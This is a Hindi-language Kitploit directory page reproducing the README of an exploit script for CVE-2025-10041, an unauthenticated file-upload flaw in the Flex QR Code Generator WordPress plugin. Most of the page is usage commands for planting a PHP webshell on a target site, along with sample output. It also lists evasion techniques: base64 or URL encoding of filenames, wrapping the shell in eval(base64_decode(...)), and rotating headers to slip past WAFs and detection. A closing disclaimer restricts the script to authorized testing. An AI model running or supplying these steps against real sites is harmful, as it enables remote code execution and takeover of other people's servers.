Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - अप्रमाणित मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-10041
पेलोड जनरेशनभेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणWAF बाईपास
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - अप्रमाणित मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
3310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - प्रमाणीकरण रहित मनमाना फ़ाइल अपलोड

🚨 Flex QR Code Generator ≤ 1.2.5 - प्रमाणीकरण रहित मनमाना फ़ाइल अपलोड


📝 विवरण

Flex QR Code Generator वर्डप्रेस प्लगइन save_qr_code_to_db() फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण संस्करण 1.2.5 तक (और शामिल) मनमाना फ़ाइल अपलोड के लिए असुरक्षित है।
यह प्रमाणीकरण रहित हमलावरों को प्रभावित साइट के सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन हो सकता है।

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (क्रिटिकल)

💡 इस स्क्रिप्ट के बारे में

CVE-2025-10041.py एक पेशेवर शोषण उपकरण है जो इस कमजोरी का लाभ उठाकर हमले को स्वचालित करने के लिए डिज़ाइन किया गया है। यह सामान्य सुरक्षा उपायों और एन्कोडिंग तकनीकों को बायपास करने के लिए उन्नत सुविधाएँ प्रदान करता है।



⚙️ विशेषताएं

  • स्वचालित कमजोरी पहचान (संस्करण जाँच)
  • मनमाना फ़ाइल अपलोड (PHP वेबशेल सहित)
  • फ़ाइलनाम एन्कोडिंग बायपास: Base64 या URL एन्कोडिंग
  • सामग्री एन्कोडिंग बायपास: शेल कोड के लिए PHP base64 रैपर
  • यादृच्छिक HTTP हेडर बुनियादी WAFs से बचने के लिए
  • कस्टम हेडर समर्थन
  • पूर्ण कमांड-लाइन इंटरफ़ेस तर्क पार्सिंग और सहायता संदेश के साथ

🖥️ उपयोग

1. बुनियादी शोषण

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. शेल फ़ाइलनाम एन्कोडिंग

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. शेल सामग्री एन्कोडिंग

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. कस्टम शेल फ़ाइलनाम

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. उन्नत (विकल्प संयोजित करें)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. कस्टम हेडर

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 सहायता

सभी उपलब्ध विकल्पों और उपयोग निर्देशों को देखने के लिए:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 बायपास तकनीकें

  • फ़ाइलनाम एन्कोडिंग: कुछ सर्वर .php या संदिग्ध नामों को ब्लॉक करते हैं; एन्कोडिंग फ़िल्टर को बायपास कर सकती है।
  • सामग्री एन्कोडिंग: शेल कोड को eval(base64_decode(...)) में लपेटने से सामग्री फ़िल्टर को बायपास किया जा सकता है।
  • यादृच्छिक हेडर: पहचान से बचने के लिए यूज़र-एजेंट, रेफ़रर और कुकीज़ को घुमाना।
  • कस्टम हेडर: उन्नत चोरी के लिए अपने स्वयं के हेडर जोड़ें।

📋 उदाहरण आउटपुट

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक, शोध और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान की गई है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति नहीं है, सख्त वर्जित और अवैध है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


✍️ द्वारा:

Nxploited (Khaled Alenazi)

टूल डाउनलोड करें